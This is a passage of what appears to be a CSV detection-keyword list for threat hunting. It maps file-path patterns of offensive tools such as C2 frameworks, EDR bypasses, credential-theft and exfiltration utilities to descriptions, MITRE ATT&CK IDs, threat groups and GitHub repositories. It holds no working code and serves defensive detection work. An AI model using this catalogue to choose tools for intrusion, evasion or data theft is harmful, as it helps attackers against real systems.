fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*\Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\Ekko.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to 
SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\ELF\portscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*\ELF\serverscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*\Elite.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\Elite.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*\empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\enc_shellcode.h*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\enum_av.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\enum_dns.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ES.Alan.Core*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*\EternalHushCore\*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" +"*\etw-fuck.cpp*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*\etw-fuck.exe*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*\ETWHash.*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" +"*\EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*\evil.dll*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*\evil.dll*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*\evil_pdf\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*\EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*\evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*\EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*\evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*\exe_to_dll\*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*\Exegol-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\Exegol-images-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\Exegol-images-*\*docker*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\ExternalC2\*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*\FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\Fertliser.exe*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*\Fertliser.pdb*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*\Files\ContainersFileUrls.txt*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*\find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" 
+"*\FreeFileSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\FreeFileSync\Logs\*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\FreeFileSync_*_Windows_Setup.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*\freeze.go","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. 
and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" +"*\FtpC2\*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*\FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*\get_netconnections.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" 
+"*\get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Get-SpoolStatus.ps1*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*\GetWebDAVStatus\","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*\GetWebDAVStatus_x64*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*\glit.exe*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*\glit-cli*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*\gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*\gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*\gocrack-master.*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*\GodFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*\Godpotato\*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
